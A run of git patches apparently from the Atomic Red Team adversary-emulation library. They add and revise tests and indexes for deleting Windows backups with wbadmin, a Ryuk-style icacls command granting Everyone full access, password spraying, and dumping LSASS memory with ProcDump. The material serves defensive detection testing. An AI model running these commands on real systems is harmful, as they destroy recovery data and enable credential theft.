newline at end of file From da83687a17c3e7e50bdc8e5b3c61c68beb8f89cf Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Sun, 24 Jan 2021 00:53:38 +0000 Subject: [PATCH 090/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1490/T1490.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml index aea49d27..3c0facd0 100644 --- a/atomics/T1490/T1490.yaml +++ b/atomics/T1490/T1490.yaml @@ -92,6 +92,7 @@ atomic_tests: name: command_prompt elevation_required: true - name: Windows - wbadmin Delete systemstatebackup + auto_generated_guid: 584331dd-75bc-4c02-9e0b-17f5fd81c748 description: | Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. supported_platforms: diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 51d3e427..e6789bd3 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -654,3 +654,4 @@ a19ee671-ed98-4e9d-b19c-d1954a51585a ec3a835e-adca-4c7c-88d2-853b69c11bb9 6502c8f0-b775-4dbd-9193-1298f56b6781 ab042179-c0c5-402f-9bc8-42741f5ce359 +584331dd-75bc-4c02-9e0b-17f5fd81c748 From 0b39063268ffb1346a33e4274335c7e93351bfe6 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Sun, 24 Jan 2021 00:53:46 +0000 Subject: [PATCH 091/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 3 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 3 +- atomics/Indexes/Indexes-Markdown/index.md | 3 +- .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/index.yaml | 19 +++++++++-- atomics/T1490/T1490.md | 32 +++++++++++++++++-- 6 files changed, 54 insertions(+), 9 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index c91764f4..5b38043c 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -540,10 +540,11 @@ impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDele impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt -impact,T1490,Inhibit System Recovery,3,Windows - Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt +impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt +impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b143b48c..e5b2c138 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -390,10 +390,11 @@ impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt -impact,T1490,Inhibit System Recovery,3,Windows - Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt +impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt +impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 67a11606..add95244 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -992,10 +992,11 @@ - [T1490 Inhibit System Recovery](../../T1490/T1490.md) - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows] - - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] + - Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows] - T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 8a986c6b..8fd72392 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -738,10 +738,11 @@ - [T1490 Inhibit System Recovery](../../T1490/T1490.md) - Atomic Test #1: Windows - Delete Volume Shadow Copies [windows] - Atomic Test #2: Windows - Delete Volume Shadow Copies via WMI [windows] - - Atomic Test #3: Windows - Delete Windows Backup Catalog [windows] + - Atomic Test #3: Windows - wbadmin Delete Windows Backup Catalog [windows] - Atomic Test #4: Windows - Disable Windows Recovery Console Repair [windows] - Atomic Test #5: Windows - Delete Volume Shadow Copies via WMI with PowerShell [windows] - Atomic Test #6: Windows - Delete Backup Files [windows] + - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows] - T1491.001 Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1499.001 OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 2a38792f..8ac803b9 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -43497,7 +43497,7 @@ impact: ' name: command_prompt elevation_required: true - - name: Windows - Delete Windows Backup Catalog + - name: Windows - wbadmin Delete Windows Backup Catalog auto_generated_guid: 263ba6cb-ea2b-41c9-9d4e-b652dadd002c description: | Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, @@ -43505,7 +43505,7 @@ impact: supported_platforms: - windows executor: - command: 'wbadmin.exe delete catalog -quiet + command: 'wbadmin delete catalog -quiet ' name: command_prompt @@ -43552,6 +43552,21 @@ impact: command: 'del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk +' + name: command_prompt + elevation_required: true + - name: Windows - wbadmin Delete systemstatebackup + auto_generated_guid: 584331dd-75bc-4c02-9e0b-17f5fd81c748 + description: 'Deletes the Windows systemstatebackup using wbadmin.exe. This + technique is used by numerous ransomware families. This may only be successful + on server platforms that have Windows Backup enabled. + +' + supported_platforms: + - windows + executor: + command: 'wbadmin delete systemstatebackup -keepVersions:0 + ' name: command_prompt elevation_required: true diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index 1d26e07d..99ce741a 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md @@ -15,7 +15,7 @@ A number of native Windows utilities have been used by adversaries to disable or - [Atomic Test #2 - Windows - Delete Volume Shadow Copies via WMI](#atomic-test-2---windows---delete-volume-shadow-copies-via-wmi) -- [Atomic Test #3 - Windows - Delete Windows Backup Catalog](#atomic-test-3---windows---delete-windows-backup-catalog) +- [Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog](#atomic-test-3---windows---wbadmin-delete-windows-backup-catalog) - [Atomic Test #4 - Windows - Disable Windows Recovery Console Repair](#atomic-test-4---windows---disable-windows-recovery-console-repair) @@ -23,6 +23,8 @@ A number of native Windows utilities have been used by adversaries to disable or - [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files) +- [Atomic Test #7 - Windows - wbadmin Delete systemstatebackup](#atomic-test-7---windows---wbadmin-delete-systemstatebackup) +
@@ -92,7 +94,7 @@ wmic.exe shadowcopy delete

-## Atomic Test #3 - Windows - Delete Windows Backup Catalog +## Atomic Test #3 - Windows - wbadmin Delete Windows Backup Catalog Deletes Windows Backup Catalog. This technique is used by numerous ransomware families and APT malware such as Olympic Destroyer. Upon execution, "The backup catalog has been successfully deleted." will be displayed in the PowerShell session. @@ -106,7 +108,7 @@ Deletes Windows Backup Catalog. This technique is used by numerous ransomware fa ```cmd -wbadmin.exe delete catalog -quiet +wbadmin delete catalog -quiet ``` @@ -197,4 +199,28 @@ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\back +
+
+ +## Atomic Test #7 - Windows - wbadmin Delete systemstatebackup +Deletes the Windows systemstatebackup using wbadmin.exe. This technique is used by numerous ransomware families. This may only be successful on server platforms that have Windows Backup enabled. + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +wbadmin delete systemstatebackup -keepVersions:0 +``` + + + + + +
From 3b9bddaf2001a2298391fc893958ece3e7d7ea58 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 25 Jan 2021 06:42:40 -0700 Subject: [PATCH 092/131] Ryuk (#1376) * adjust for usability * change executor * add input arg Co-authored-by: Michael Haag <5632822+MHaggis@users.noreply.github.com> --- atomics/T1222.001/T1222.001.yaml | 18 ++++++++++++++---- 1 file changed, 14 insertions(+), 4 deletions(-) diff --git a/atomics/T1222.001/T1222.001.yaml b/atomics/T1222.001/T1222.001.yaml index 75146a0e..4f03b7de 100644 --- a/atomics/T1222.001/T1222.001.yaml +++ b/atomics/T1222.001/T1222.001.yaml @@ -118,11 +118,21 @@ atomic_tests: del #{file_or_folder}\T1222.001_attrib*.txt rmdir #{file_or_folder} name: command_prompt -- name: 'Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style' +- name: 'Grant Full Access to folder for Everyone - Ryuk Ransomware Style' auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 - description: Invokes the command line used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. + description: | + Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. + **icacls "C:\*" /grant Everyone:F /T /C /Q** + However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. + You can set your own path variable to "C:\*" if you prefer. supported_platforms: - windows + input_arguments: + path: + description: Path of folder to recursively set permissions on + type: path + default: 'C:\Users\Public\*' executor: - command: icacls "C:\*" /grant Everyone:F /T /C /Q - name: powershell + command: icacls "#{path}" /grant Everyone:F /T /C /Q + name: command_prompt + elevation_required: true \ No newline at end of file From 3fe613c6ddd431c1ed84fbad58a672c65be99d63 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 25 Jan 2021 13:43:05 +0000 Subject: [PATCH 093/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 2 +- atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +- atomics/Indexes/Indexes-Markdown/index.md | 2 +- .../Indexes/Indexes-Markdown/windows-index.md | 2 +- atomics/Indexes/index.yaml | 19 +++++++++++----- atomics/T1222.001/T1222.001.md | 22 +++++++++++++------ 6 files changed, 33 insertions(+), 16 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 5b38043c..cab460c0 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -528,7 +528,7 @@ defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1, defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt -defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index e5b2c138..2efff797 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -314,7 +314,7 @@ defense-evasion,T1222.001,Windows File and Directory Permissions Modification,1, defense-evasion,T1222.001,Windows File and Directory Permissions Modification,2,cacls - Grant permission to specified user or group recursively,a8206bcc-f282-40a9-a389-05d9c0263485,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,3,attrib - Remove read-only attribute,bec1e95c-83aa-492e-ab77-60c71bbd21b0,command_prompt defense-evasion,T1222.001,Windows File and Directory Permissions Modification,4,attrib - hide file,32b979da-7b68-42c9-9a99-0e39900fc36c,command_prompt -defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,powershell +defense-evasion,T1222.001,Windows File and Directory Permissions Modification,5,Grant Full Access to folder for Everyone - Ryuk Ransomware Style,ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6,command_prompt defense-evasion,T1220,XSL Script Processing,1,MSXSL Bypass using local files,ca23bfb2-023f-49c5-8802-e66997de462d,command_prompt defense-evasion,T1220,XSL Script Processing,2,MSXSL Bypass using remote files,a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985,command_prompt defense-evasion,T1220,XSL Script Processing,3,WMIC bypass using local XSL file,1b237334-3e21-4a0c-8178-b8c996124988,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index add95244..afc3f27c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -962,7 +962,7 @@ - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows] - Atomic Test #3: attrib - Remove read-only attribute [windows] - Atomic Test #4: attrib - hide file [windows] - - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] + - Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows] - [T1220 XSL Script Processing](../../T1220/T1220.md) - Atomic Test #1: MSXSL Bypass using local files [windows] - Atomic Test #2: MSXSL Bypass using remote files [windows] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 8fd72392..c55feaa0 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -569,7 +569,7 @@ - Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows] - Atomic Test #3: attrib - Remove read-only attribute [windows] - Atomic Test #4: attrib - hide file [windows] - - Atomic Test #5: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style [windows] + - Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows] - [T1220 XSL Script Processing](../../T1220/T1220.md) - Atomic Test #1: MSXSL Bypass using local files [windows] - Atomic Test #2: MSXSL Bypass using remote files [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8ac803b9..1c5b84b1 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -42143,15 +42143,24 @@ defense-evasion: del #{file_or_folder}\T1222.001_attrib*.txt rmdir #{file_or_folder} name: command_prompt - - name: Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style + - name: Grant Full Access to folder for Everyone - Ryuk Ransomware Style auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6 - description: Invokes the command line used by Ryuk Ransomware to grant full - access to the entire C:\ drive for Everyone. + description: | + Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. + **icacls "C:\*" /grant Everyone:F /T /C /Q** + However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. + You can set your own path variable to "C:\*" if you prefer. supported_platforms: - windows + input_arguments: + path: + description: Path of folder to recursively set permissions on + type: path + default: C:\Users\Public\* executor: - command: icacls "C:\*" /grant Everyone:F /T /C /Q - name: powershell + command: icacls "#{path}" /grant Everyone:F /T /C /Q + name: command_prompt + elevation_required: true T1220: technique: id: attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3 diff --git a/atomics/T1222.001/T1222.001.md b/atomics/T1222.001/T1222.001.md index 3559d65b..576c3ad0 100644 --- a/atomics/T1222.001/T1222.001.md +++ b/atomics/T1222.001/T1222.001.md @@ -16,7 +16,7 @@ Adversaries can interact with the DACLs using built-in Windows commands, such as - [Atomic Test #4 - attrib - hide file](#atomic-test-4---attrib---hide-file) -- [Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style](#atomic-test-5---grant-full-access-to-entire-c-drive-for-everyone---ryuk-ransomware-style) +- [Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style](#atomic-test-5---grant-full-access-to-folder-for-everyone---ryuk-ransomware-style)
@@ -209,20 +209,28 @@ echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt

-## Atomic Test #5 - Grant Full Access to Entire C:\ Drive for Everyone - Ryuk Ransomware Style -Invokes the command line used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. +## Atomic Test #5 - Grant Full Access to folder for Everyone - Ryuk Ransomware Style +Invokes the command line similar to that used by Ryuk Ransomware to grant full access to the entire C:\ drive for Everyone. +**icacls "C:\*" /grant Everyone:F /T /C /Q** +However, for this atomic we set the permission on C:\Users\Public so it completes faster and doesn't irreversibly affect the host. +You can set your own path variable to "C:\*" if you prefer. **Supported Platforms:** Windows - -#### Attack Commands: Run with `powershell`! +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| path | Path of folder to recursively set permissions on | path | C:\Users\Public\*| -```powershell -icacls "C:\*" /grant Everyone:F /T /C /Q +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +icacls "#{path}" /grant Everyone:F /T /C /Q ``` From b3b1a2bb68c0b3bbce2798cc4f6404fe1e7b4008 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Mon, 1 Feb 2021 10:00:51 -0700 Subject: [PATCH 094/131] typo fix (#1379) --- atomics/T1110.003/T1110.003.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 7c8c81c7..2291a18b 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -12,7 +12,7 @@ atomic_tests: Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. - See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 + See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 supported_platforms: - windows input_arguments: From 16ad79e86461731aaa723f53aa5ad12fd066bd7c Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 1 Feb 2021 17:01:17 +0000 Subject: [PATCH 095/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1110.003/T1110.003.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 1c5b84b1..568771e0 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -21788,7 +21788,7 @@ credential-access: CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. - See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 + See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 supported_platforms: - windows input_arguments: diff --git a/atomics/T1110.003/T1110.003.md b/atomics/T1110.003/T1110.003.md index 16e10de9..0b10ac41 100644 --- a/atomics/T1110.003/T1110.003.md +++ b/atomics/T1110.003/T1110.003.md @@ -36,7 +36,7 @@ In default environments, LDAP and Kerberos connection attempts are less likely t CAUTION! Be very careful to not exceed the password lockout threshold for users in the domain by running this test too frequently. This atomic attempts to map the IPC$ share on one of the Domain Controllers using a password of Spring2020 for each user in the %temp%\users.txt list. Any successful authentications will be printed to the screen with a message like "[*] username:password", whereas a failed auth will simply print a period. Use the input arguments to specify your own password to use for the password spray. Use the get_prereq_command's to create a list of all domain users in the temp directory called users.txt. -See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 +See the "Windows FOR Loop Password Spraying Made Easy" blog by @OrOneEqualsOne for more details on how these spray commands work. https://medium.com/walmartlabs/windows-for-loop-password-spraying-made-easy-c8cd4ebb86b5 **Supported Platforms:** Windows From 05ce4209b5ea47759453d53d730d230d0f617d29 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Tue, 2 Feb 2021 19:32:35 -0700 Subject: [PATCH 096/131] procdump mini dump (#1380) Co-authored-by: mhaag-spl <76067280+mhaag-spl@users.noreply.github.com> --- atomics/T1003.001/T1003.001.yaml | 38 ++++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 1e58a03b..038c7141 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -255,3 +255,41 @@ atomic_tests: Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore name: powershell elevation_required: true + +- name: Create Mini Dump of LSASS.exe using ProcDump + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals + ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe + + Upon successful execution, you should see the following file created c:\windows\temp\lsass_dump.dmp. + + If you see a message saying "procdump.exe is not recognized as an internal or external command", try using the get-prereq_commands to download and install the ProcDump tool first. + supported_platforms: + - windows + input_arguments: + output_file: + description: Path where resulting dump should be placed + type: Path + default: C:\Windows\Temp\lsass_dump.dmp + procdump_exe: + description: Path of Procdump executable + type: Path + default: PathToAtomicsFolder\T1003.001\bin\procdump.exe + dependency_executor_name: powershell + dependencies: + - description: | + ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe}) + prereq_command: | + if (Test-Path #{procdump_exe}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip" + Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force + New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null + Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force + executor: + command: | + #{procdump_exe} -accepteula -mm lsass.exe #{output_file} + cleanup_command: | + del "#{output_file}" >nul 2> nul + name: command_prompt + elevation_required: true \ No newline at end of file From 333e2407afd0774c511100ef6202ed2c09f6fce0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Wed, 3 Feb 2021 02:32:53 +0000 Subject: [PATCH 097/131] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/T1003.001/T1003.001.yaml | 1 + atomics/used_guids.txt | 1 + 2 files changed, 2 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 038c7141..e514e80b 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -257,6 +257,7 @@ atomic_tests: elevation_required: true - name: Create Mini Dump of LSASS.exe using ProcDump + auto_generated_guid: 7cede33f-0acd-44ef-9774-15511300b24b description: | The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. This particular method uses -mm to produce a mini dump of lsass.exe diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index e6789bd3..b7d3c91a 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -655,3 +655,4 @@ ec3a835e-adca-4c7c-88d2-853b69c11bb9 6502c8f0-b775-4dbd-9193-1298f56b6781 ab042179-c0c5-402f-9bc8-42741f5ce359 584331dd-75bc-4c02-9e0b-17f5fd81c748 +7cede33f-0acd-44ef-9774-15511300b24b From 802c6f33bcd4b9e2337b3e5ad49444f04fefae23 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 3 Feb 2021 02:33:01 +0000 Subject: [PATCH 098/131] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 41 ++++++++++++++ atomics/T1003.001/T1003.001.md | 56 +++++++++++++++++++ 6 files changed, 101 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv 